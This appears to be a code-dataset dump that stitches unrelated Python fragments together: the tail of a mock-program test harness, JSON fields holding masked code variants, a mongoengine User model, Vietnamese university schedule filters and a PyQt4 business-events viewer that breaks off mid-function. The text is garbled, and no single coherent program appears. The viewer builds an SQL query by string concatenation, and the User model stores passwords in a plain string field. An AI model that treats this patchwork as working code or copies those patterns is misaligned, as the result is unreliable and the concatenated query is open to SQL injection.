MOCK_PROGRAM_INPUT: log -1\n# MOCK_PROGRAM_RETURN: 0\n# MOCK_PROGRAM_OUTPUT: This is the summary line\n#\n# The is the body of the commit msg\n# MOCK_PROGRAM_INPUT: diff --name-only HEAD --not @{u}\n# MOCK_PROGRAM_RETURN: 0\n# MOCK_PROGRAM_OUTPUT: file_name_1.txt\n# file_name_2.txt\n# file_name_3.txt\n\n#\n\nimport sys\nimport os\n\ninputArgs = ' '.join(sys.argv[1:])\n#print(\"inputArgs = '\" + inputArgs + \"'\"\n\nif os.environ.get(\"MOCKPROGRAM_INOUT_FILE_OVERRIDE\"):\n mockProgramInOutFilePath=os.environ.get(\"MOCKPROGRAM_INOUT_FILE_OVERRIDE\")\nelse:\n mockProgramInOutFilePath='.mockprogram_inout.txt'\n\nif not os.path.exists(mockProgramInOutFilePath):\n print(\"Error: \"+mockProgramInOutFilePath+\" is missing!\")\n sys.exit(1)\n\nmockprogramInout = open(mockProgramInOutFilePath, 'r').read()\nmockprogramInoutArray = mockprogramInout.splitlines()\nif len(mockprogramInoutArray) and mockprogramInoutArray[-1] == \"\":\n mockprogramInoutArray = mockprogramInoutArray[:-1]\n\nif len(mockprogramInoutArray) < 3:\n print(\"Error: \"+mockProgramInOutFilePath+\" has less than three lines:\\n\"\n \"-------------\\n\" + mockprogramInout + \"-------------\")\n sys.exit(2)\n\n# Assert input\nexpectedInputLine = mockprogramInoutArray[0]\nif expectedInputLine.find(\"MOCK_PROGRAM_INPUT:\") != 0:\n print(\"Error, first line = '\" + expectedInputLine + \"', does not match \"\n \"^MOCK_PROGRAM_INPUT:\") \n sys.exit(3)\nexpectedInput = expectedInputLine.replace(\"MOCK_PROGRAM_INPUT:\", \"\").strip()\nif inputArgs != expectedInput:\n print(\"Error, input args='\" + inputArgs + \"' does not match expected='\" +\n expectedInput + \"'\")\n sys.exit(4)\n\n# Get return code\nreturnCodeLine = mockprogramInoutArray[1]\nif returnCodeLine.find(\"MOCK_PROGRAM_RETURN:\") != 0:\n print(\"Error, second line = '\" + returnCodeLine + \"', does not match \"\n \"^MOCK_PROGRAM_RETURN:\") \n sys.exit(5)\nreturnCode = returnCodeLine.replace(\"MOCK_PROGRAM_RETURN:\", \"\").strip()\n\n# Get output (can be multi-line)\noutputLine = mockprogramInoutArray[2]\nif outputLine.find(\"MOCK_PROGRAM_OUTPUT:\") != 0:\n print(\"Error, third line = '\" + outputLine + \"', does not match \"\n \"^MOCK_PROGRAM_OUTPUT:\") \n sys.exit(6)\noutputStr = outputLine.replace(\"MOCK_PROGRAM_OUTPUT: \", \"\")\nnumLinesOuput = 1\nif len(mockprogramInoutArray) > 3:\n for line in mockprogramInoutArray[3:]:\n if line.find(\"MOCK_PROGRAM_INPUT:\") == 0:\n break\n outputStr = outputStr+\"\\n\"+line\n numLinesOuput = numLinesOuput + 1\nprint(outputStr)\n\n# Write the remaining lines back into the file\nlineLineIndex = 2 + numLinesOuput\nif len(mockprogramInoutArray) > lineLineIndex:\n open(mockProgramInOutFilePath, 'w').write(\n ('\\n'.join(mockprogramInoutArray[lineLineIndex:]))+\"\\n\" )\nelse:\n open(mockProgramInOutFilePath, 'w').write(\"\")\n\n# Return exit code\nsys.exit(int(returnCode))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
USERS MODEL
"""
from www import app
import mongoengine
import datetime
class User(mongoengine.Document):
username = mongoengine.StringField(required=True)
password = mongoengine.StringField(required=True)
email = mongoengine.StringField(required=True)
active_hash = mongoengine.StringField(required=False, default=None)
active_hash_expires = mongoengine.DateTimeField(required=False,
default=None)
recover_hash = mongoengine.StringField(required=False)
recover_hash_expires = mongoengine.DateTimeField(required=False)
active = mongoengine.BooleanField(required=True, default=False)
locked = mongoengine.BooleanField(required=True, default=True) # locked changes depending on user active or not
first_name = mongoengine.StringField(required=False)
last_name = mongoengine.StringField(required=False)
show_as = mongoengine.StringField(required=False)
date_of_birth = mongoengine.DateTimeField(required=False)
created_at = mongoengine.DateTimeField(required=True, default=datetime.datetime.utcnow())
updated_at = mongoengine.DateTimeField(required=False, default=datetime.datetime.utcnow())
meta = {
'db_alias': app.config["DEFAULT_DATABASE_ALIAS"],
'collection': 'users',
}
@classmethod
def pre_save(cls, sender, document, **kwargs):
document.updated_at = datetime.datetime.utcnow()
mongoengine.signals.pre_save.connect(User.pre_save, sender=User)
|
normal
|
{
"blob_id": "51cdb41836415c08609ee6a6bcc3adbaf2533da4",
"index": 3697,
"step-1": "<mask token>\n\n\nclass User(mongoengine.Document):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def pre_save(cls, sender, document, **kwargs):\n document.updated_at = datetime.datetime.utcnow()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass User(mongoengine.Document):\n username = mongoengine.StringField(required=True)\n password = mongoengine.StringField(required=True)\n email = mongoengine.StringField(required=True)\n active_hash = mongoengine.StringField(required=False, default=None)\n active_hash_expires = mongoengine.DateTimeField(required=False, default\n =None)\n recover_hash = mongoengine.StringField(required=False)\n recover_hash_expires = mongoengine.DateTimeField(required=False)\n active = mongoengine.BooleanField(required=True, default=False)\n locked = mongoengine.BooleanField(required=True, default=True)\n first_name = mongoengine.StringField(required=False)\n last_name = mongoengine.StringField(required=False)\n show_as = mongoengine.StringField(required=False)\n date_of_birth = mongoengine.DateTimeField(required=False)\n created_at = mongoengine.DateTimeField(required=True, default=datetime.\n datetime.utcnow())\n updated_at = mongoengine.DateTimeField(required=False, default=datetime\n .datetime.utcnow())\n meta = {'db_alias': app.config['DEFAULT_DATABASE_ALIAS'], 'collection':\n 'users'}\n\n @classmethod\n def pre_save(cls, sender, document, **kwargs):\n document.updated_at = datetime.datetime.utcnow()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass User(mongoengine.Document):\n username = mongoengine.StringField(required=True)\n password = mongoengine.StringField(required=True)\n email = mongoengine.StringField(required=True)\n active_hash = mongoengine.StringField(required=False, default=None)\n active_hash_expires = mongoengine.DateTimeField(required=False, default\n =None)\n recover_hash = mongoengine.StringField(required=False)\n recover_hash_expires = mongoengine.DateTimeField(required=False)\n active = mongoengine.BooleanField(required=True, default=False)\n locked = mongoengine.BooleanField(required=True, default=True)\n first_name = mongoengine.StringField(required=False)\n last_name = mongoengine.StringField(required=False)\n show_as = mongoengine.StringField(required=False)\n date_of_birth = mongoengine.DateTimeField(required=False)\n created_at = mongoengine.DateTimeField(required=True, default=datetime.\n datetime.utcnow())\n updated_at = mongoengine.DateTimeField(required=False, default=datetime\n .datetime.utcnow())\n meta = {'db_alias': app.config['DEFAULT_DATABASE_ALIAS'], 'collection':\n 'users'}\n\n @classmethod\n def pre_save(cls, sender, document, **kwargs):\n document.updated_at = datetime.datetime.utcnow()\n\n\nmongoengine.signals.pre_save.connect(User.pre_save, sender=User)\n",
"step-4": "<mask token>\nfrom www import app\nimport mongoengine\nimport datetime\n\n\nclass User(mongoengine.Document):\n username = mongoengine.StringField(required=True)\n password = mongoengine.StringField(required=True)\n email = mongoengine.StringField(required=True)\n active_hash = mongoengine.StringField(required=False, default=None)\n active_hash_expires = mongoengine.DateTimeField(required=False, default\n =None)\n recover_hash = mongoengine.StringField(required=False)\n recover_hash_expires = mongoengine.DateTimeField(required=False)\n active = mongoengine.BooleanField(required=True, default=False)\n locked = mongoengine.BooleanField(required=True, default=True)\n first_name = mongoengine.StringField(required=False)\n last_name = mongoengine.StringField(required=False)\n show_as = mongoengine.StringField(required=False)\n date_of_birth = mongoengine.DateTimeField(required=False)\n created_at = mongoengine.DateTimeField(required=True, default=datetime.\n datetime.utcnow())\n updated_at = mongoengine.DateTimeField(required=False, default=datetime\n .datetime.utcnow())\n meta = {'db_alias': app.config['DEFAULT_DATABASE_ALIAS'], 'collection':\n 'users'}\n\n @classmethod\n def pre_save(cls, sender, document, **kwargs):\n document.updated_at = datetime.datetime.utcnow()\n\n\nmongoengine.signals.pre_save.connect(User.pre_save, sender=User)\n",
"step-5": "\"\"\"\n USERS MODEL\n\"\"\"\n\nfrom www import app\nimport mongoengine\nimport datetime\n\n\nclass User(mongoengine.Document):\n username = mongoengine.StringField(required=True)\n password = mongoengine.StringField(required=True)\n email = mongoengine.StringField(required=True)\n\n active_hash = mongoengine.StringField(required=False, default=None)\n active_hash_expires = mongoengine.DateTimeField(required=False,\n default=None)\n\n recover_hash = mongoengine.StringField(required=False)\n recover_hash_expires = mongoengine.DateTimeField(required=False)\n\n active = mongoengine.BooleanField(required=True, default=False)\n locked = mongoengine.BooleanField(required=True, default=True) # locked changes depending on user active or not\n\n first_name = mongoengine.StringField(required=False)\n last_name = mongoengine.StringField(required=False)\n show_as = mongoengine.StringField(required=False)\n date_of_birth = mongoengine.DateTimeField(required=False)\n\n created_at = mongoengine.DateTimeField(required=True, default=datetime.datetime.utcnow())\n updated_at = mongoengine.DateTimeField(required=False, default=datetime.datetime.utcnow())\n\n meta = {\n 'db_alias': app.config[\"DEFAULT_DATABASE_ALIAS\"],\n 'collection': 'users',\n }\n\n @classmethod\n def pre_save(cls, sender, document, **kwargs):\n document.updated_at = datetime.datetime.utcnow()\n\n\nmongoengine.signals.pre_save.connect(User.pre_save, sender=User)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from dateutil import parser
from datetime import datetime
from backend.crawler import calender_crawler
from backend.logic.schedule_by_time.schedule_utils import get_weeks_of_subject
from backend.logic.schedule_by_time.schedule_utils import get_time_str
# e.g. hôm nay, hôm qua, ngày mai, thứ 2, thứ tư, chủ nhật, thứ năm tuần trước, thứ bảy tuần này, 04-06-2020, 10/06/2020 ....
def filter_by_weekday(schedule_table, time_entity):
time_str = get_time_str(time_entity)
time = parser.parse(time_str)
weekday = time.weekday() + 2
schedule = []
for row in schedule_table:
weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].strip())
weeks_of_subject = get_weeks_of_subject(row)
week_now = int(calender_crawler.crawl_callender()[1])
if (weekday_of_subject == weekday) and (week_now in weeks_of_subject):
schedule.append(row)
return schedule
# e.g. sáng mai, tối hôm qua, chiều hôm nay, sáng thứ 4 tuần này, chiều thứ 5 tuần sau, ....
def filter_by_session(schedule_table, time_entity):
subjects_of_day = filter_by_weekday(schedule_table, time_entity)
start_session_hour = parser.parse(time_entity['value']['from']).hour
schedule = []
for subject in subjects_of_day:
subject_start_time = int(subject['time'].split(',')[1].split('-')[0].split('h')[0].strip())
if (start_session_hour == 4) and (subject_start_time >= 12): # morning
continue
if (start_session_hour == 12) and (subject_start_time < 12): # afternoon
continue
if(start_session_hour == 18) and (subject_start_time < 18): # evening
continue
schedule.append(subject)
return schedule
# e.g. 9 giờ sáng mai, 7 giờ tối hôm qua, 4 giờ chiều thứ 2, ....
def filter_by_hour(schedule_table, time_entity):
subjects_of_day = filter_by_weekday(schedule_table, time_entity)
schedule = []
hour = parser.parse(get_time_str(time_entity)).hour
for subject in subjects_of_day:
subject_start_hour = int(subject['time'].split(',')[1].split('-')[0].split('h')[0].strip())
subject_end_hour = int(subject['time'].split(',')[1].split('-')[1].split('h')[0].strip())
if subject_start_hour <= hour <= subject_end_hour:
schedule.append(subject)
return schedule
# e.g. tuần sau, tuần trước, tuần này, ....
def filter_by_week(schedule_table, time_entity):
schedule = []
for row in schedule_table:
weeks_of_subject = get_weeks_of_subject(row)
week_now = int(calender_crawler.crawl_callender()[1])
if week_now in weeks_of_subject:
schedule.append(row)
return schedule
# e.g. tháng 3, tháng sau, tháng trước ....
def filter_by_month(schedule_table, time_entity):
return schedule_table
def filter_by_year(schedule_table, time_entity):
return schedule_table
def filter_by_multi_week(schedule_table, time_entity):
return schedule_table
def filter_by_multi_month(schedule_table, time_entity):
return schedule_table
def check_out_of_semester(time_entity):
time_str = get_time_str(time_entity)
date_str = time_str.split('T')[0]
date_ask = datetime.strptime(date_str, '%Y-%m-%d')
today = datetime.now()
diff_days = (date_ask - today).days
diff_weeks = diff_days // 7
semester_now = calender_crawler.crawl_callender()[0]
week_now = int(calender_crawler.crawl_callender()[1])
week_asked = week_now + diff_weeks
if (semester_now[4] == '1') and (week_asked > 25 or week_asked < 0): # 20191, 20201, 20211....
return True
if (semester_now[4] == '2') and (week_asked <= 25 or week_asked > 50):
return True
return False
|
normal
|
{
"blob_id": "6339f5c980ab0c0fb778870196493ddd83963ae7",
"index": 9203,
"step-1": "<mask token>\n\n\ndef filter_by_session(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n start_session_hour = parser.parse(time_entity['value']['from']).hour\n schedule = []\n for subject in subjects_of_day:\n subject_start_time = int(subject['time'].split(',')[1].split('-')[0\n ].split('h')[0].strip())\n if start_session_hour == 4 and subject_start_time >= 12:\n continue\n if start_session_hour == 12 and subject_start_time < 12:\n continue\n if start_session_hour == 18 and subject_start_time < 18:\n continue\n schedule.append(subject)\n return schedule\n\n\n<mask token>\n\n\ndef filter_by_week(schedule_table, time_entity):\n schedule = []\n for row in schedule_table:\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_month(schedule_table, time_entity):\n return schedule_table\n\n\n<mask token>\n\n\ndef filter_by_multi_week(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_month(schedule_table, time_entity):\n return schedule_table\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef filter_by_weekday(schedule_table, time_entity):\n time_str = get_time_str(time_entity)\n time = parser.parse(time_str)\n weekday = time.weekday() + 2\n schedule = []\n for row in schedule_table:\n weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].\n strip())\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if weekday_of_subject == weekday and week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_session(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n start_session_hour = parser.parse(time_entity['value']['from']).hour\n schedule = []\n for subject in subjects_of_day:\n subject_start_time = int(subject['time'].split(',')[1].split('-')[0\n ].split('h')[0].strip())\n if start_session_hour == 4 and subject_start_time >= 12:\n continue\n if start_session_hour == 12 and subject_start_time < 12:\n continue\n if start_session_hour == 18 and subject_start_time < 18:\n continue\n schedule.append(subject)\n return schedule\n\n\n<mask token>\n\n\ndef filter_by_week(schedule_table, time_entity):\n schedule = []\n for row in schedule_table:\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_month(schedule_table, time_entity):\n return schedule_table\n\n\n<mask token>\n\n\ndef filter_by_multi_week(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_month(schedule_table, time_entity):\n return schedule_table\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef filter_by_weekday(schedule_table, time_entity):\n time_str = get_time_str(time_entity)\n time = parser.parse(time_str)\n weekday = time.weekday() + 2\n schedule = []\n for row in schedule_table:\n weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].\n strip())\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if weekday_of_subject == weekday and week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_session(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n start_session_hour = parser.parse(time_entity['value']['from']).hour\n schedule = []\n for subject in subjects_of_day:\n subject_start_time = int(subject['time'].split(',')[1].split('-')[0\n ].split('h')[0].strip())\n if start_session_hour == 4 and subject_start_time >= 12:\n continue\n if start_session_hour == 12 and subject_start_time < 12:\n continue\n if start_session_hour == 18 and subject_start_time < 18:\n continue\n schedule.append(subject)\n return schedule\n\n\n<mask token>\n\n\ndef filter_by_week(schedule_table, time_entity):\n schedule = []\n for row in schedule_table:\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_month(schedule_table, time_entity):\n return schedule_table\n\n\n<mask token>\n\n\ndef filter_by_multi_week(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_month(schedule_table, time_entity):\n return schedule_table\n\n\ndef check_out_of_semester(time_entity):\n time_str = get_time_str(time_entity)\n date_str = time_str.split('T')[0]\n date_ask = datetime.strptime(date_str, '%Y-%m-%d')\n today = datetime.now()\n diff_days = (date_ask - today).days\n diff_weeks = diff_days // 7\n semester_now = calender_crawler.crawl_callender()[0]\n week_now = int(calender_crawler.crawl_callender()[1])\n week_asked = week_now + diff_weeks\n if semester_now[4] == '1' and (week_asked > 25 or week_asked < 0):\n return True\n if semester_now[4] == '2' and (week_asked <= 25 or week_asked > 50):\n return True\n return False\n",
"step-4": "from dateutil import parser\nfrom datetime import datetime\nfrom backend.crawler import calender_crawler\nfrom backend.logic.schedule_by_time.schedule_utils import get_weeks_of_subject\nfrom backend.logic.schedule_by_time.schedule_utils import get_time_str\n\n\ndef filter_by_weekday(schedule_table, time_entity):\n time_str = get_time_str(time_entity)\n time = parser.parse(time_str)\n weekday = time.weekday() + 2\n schedule = []\n for row in schedule_table:\n weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].\n strip())\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if weekday_of_subject == weekday and week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_session(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n start_session_hour = parser.parse(time_entity['value']['from']).hour\n schedule = []\n for subject in subjects_of_day:\n subject_start_time = int(subject['time'].split(',')[1].split('-')[0\n ].split('h')[0].strip())\n if start_session_hour == 4 and subject_start_time >= 12:\n continue\n if start_session_hour == 12 and subject_start_time < 12:\n continue\n if start_session_hour == 18 and subject_start_time < 18:\n continue\n schedule.append(subject)\n return schedule\n\n\ndef filter_by_hour(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n schedule = []\n hour = parser.parse(get_time_str(time_entity)).hour\n for subject in subjects_of_day:\n subject_start_hour = int(subject['time'].split(',')[1].split('-')[0\n ].split('h')[0].strip())\n subject_end_hour = int(subject['time'].split(',')[1].split('-')[1].\n split('h')[0].strip())\n if subject_start_hour <= hour <= subject_end_hour:\n schedule.append(subject)\n return schedule\n\n\ndef filter_by_week(schedule_table, time_entity):\n schedule = []\n for row in schedule_table:\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_month(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_year(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_week(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_month(schedule_table, time_entity):\n return schedule_table\n\n\ndef check_out_of_semester(time_entity):\n time_str = get_time_str(time_entity)\n date_str = time_str.split('T')[0]\n date_ask = datetime.strptime(date_str, '%Y-%m-%d')\n today = datetime.now()\n diff_days = (date_ask - today).days\n diff_weeks = diff_days // 7\n semester_now = calender_crawler.crawl_callender()[0]\n week_now = int(calender_crawler.crawl_callender()[1])\n week_asked = week_now + diff_weeks\n if semester_now[4] == '1' and (week_asked > 25 or week_asked < 0):\n return True\n if semester_now[4] == '2' and (week_asked <= 25 or week_asked > 50):\n return True\n return False\n",
"step-5": "from dateutil import parser\nfrom datetime import datetime\n\nfrom backend.crawler import calender_crawler\nfrom backend.logic.schedule_by_time.schedule_utils import get_weeks_of_subject\nfrom backend.logic.schedule_by_time.schedule_utils import get_time_str\n\n\n# e.g. hôm nay, hôm qua, ngày mai, thứ 2, thứ tư, chủ nhật, thứ năm tuần trước, thứ bảy tuần này, 04-06-2020, 10/06/2020 ....\ndef filter_by_weekday(schedule_table, time_entity):\n time_str = get_time_str(time_entity)\n time = parser.parse(time_str)\n weekday = time.weekday() + 2\n\n schedule = []\n for row in schedule_table:\n weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].strip())\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if (weekday_of_subject == weekday) and (week_now in weeks_of_subject):\n schedule.append(row)\n return schedule\n\n\n# e.g. sáng mai, tối hôm qua, chiều hôm nay, sáng thứ 4 tuần này, chiều thứ 5 tuần sau, ....\ndef filter_by_session(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n start_session_hour = parser.parse(time_entity['value']['from']).hour\n schedule = []\n for subject in subjects_of_day:\n subject_start_time = int(subject['time'].split(',')[1].split('-')[0].split('h')[0].strip())\n if (start_session_hour == 4) and (subject_start_time >= 12): # morning\n continue\n if (start_session_hour == 12) and (subject_start_time < 12): # afternoon\n continue\n if(start_session_hour == 18) and (subject_start_time < 18): # evening\n continue\n schedule.append(subject)\n return schedule\n \n\n# e.g. 9 giờ sáng mai, 7 giờ tối hôm qua, 4 giờ chiều thứ 2, ....\ndef filter_by_hour(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n schedule = []\n hour = parser.parse(get_time_str(time_entity)).hour\n for subject in subjects_of_day:\n subject_start_hour = int(subject['time'].split(',')[1].split('-')[0].split('h')[0].strip())\n subject_end_hour = int(subject['time'].split(',')[1].split('-')[1].split('h')[0].strip())\n if subject_start_hour <= hour <= subject_end_hour:\n schedule.append(subject)\n return schedule\n\n\n# e.g. tuần sau, tuần trước, tuần này, ....\ndef filter_by_week(schedule_table, time_entity):\n schedule = []\n for row in schedule_table:\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\n# e.g. tháng 3, tháng sau, tháng trước ....\ndef filter_by_month(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_year(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_week(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_month(schedule_table, time_entity):\n return schedule_table\n\n\ndef check_out_of_semester(time_entity):\n time_str = get_time_str(time_entity)\n date_str = time_str.split('T')[0]\n date_ask = datetime.strptime(date_str, '%Y-%m-%d')\n today = datetime.now()\n diff_days = (date_ask - today).days\n diff_weeks = diff_days // 7\n semester_now = calender_crawler.crawl_callender()[0]\n week_now = int(calender_crawler.crawl_callender()[1])\n week_asked = week_now + diff_weeks\n if (semester_now[4] == '1') and (week_asked > 25 or week_asked < 0): # 20191, 20201, 20211....\n return True\n if (semester_now[4] == '2') and (week_asked <= 25 or week_asked > 50):\n return True\n return False\n \n",
"step-ids": [
5,
6,
7,
10,
11
]
}
|
[
5,
6,
7,
10,
11
] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'KPS_RevisitBusinessEvents.ui'
#
# Created: Sun May 18 14:50:49 2014
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui, QtSql
import sqlite3
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(666, 538)
palette = QtGui.QPalette()
self.eventSkip = 0;
self.db = Database()
brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
self.inWork = True
brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
Form.setPalette(palette)
self.tb_EventViewer = QtGui.QTableView(Form)
self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))
self.tb_EventViewer.setObjectName(_fromUtf8("tb_EventViewer"))
self.tb_EventViewer.horizontalHeader().setVisible(False)
self.tb_EventViewer.verticalHeader().setVisible(False)
# self.tb_EventViewer.setColumnCount(0)
# self.tb_EventViewer.setRowCount(0)
self.bt_Earlier = QtGui.QPushButton(Form)
self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))
self.bt_Earlier.setObjectName(_fromUtf8("bt_Earlier"))
self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)
self.bt_Later = QtGui.QPushButton(Form)
self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))
self.bt_Later.setObjectName(_fromUtf8("bt_Later"))
self.bt_Later.clicked.connect(self.clicked_bt_Later)
self.label = QtGui.QLabel(Form)
self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.label.setPalette(palette)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Segoe UI Light"))
font.setPointSize(18)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.cb_EventType = QtGui.QComboBox(Form)
self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))
self.cb_EventType.setObjectName(_fromUtf8("cb_EventType"))
self.cb_EventType.currentIndexChanged['QString'].connect(self.handleChanged)
self.label_2 = QtGui.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))
self.label_3 = QtGui.QLabel(Form)
self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
self.label_2.setPalette(palette)
self.label_3.setPalette(palette)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Segoe UI"))
font.setPointSize(12)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.label_3.setFont(font)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
self.initialize()
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "Revisit business events", None))
self.bt_Earlier.setText(_translate("Form", "<<", None))
self.bt_Later.setText(_translate("Form", ">>", None))
self.label.setText(_translate("Form", "Revisit business events", None))
self.label_2.setText(_translate("Form", "Select Event Type", None))
def initialize(self):
self.cb_EventType.addItems(self.getBusinessEventsType())
# self.cb_Destination.addItems(RH.getLocations())
def getBusinessEventsType(self):
conn = sqlite3.connect("../Database/Business.db")
conn.text_factory = str
c = conn.cursor()
c.execute('SELECT Event FROM EventTypes')
locs = [r[0] for r in c.fetchall()]
conn.close()
return locs
def handleChanged(self, text):
modelView = QtGui.QStandardItemModel()
query = QtSql.QSqlQuery()
query.exec_("Select * from BusinessEvents a, EventTypes b where b.Event = '" + text + "' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT " + str(self.eventSkip) + ",1")
recCount = 0;
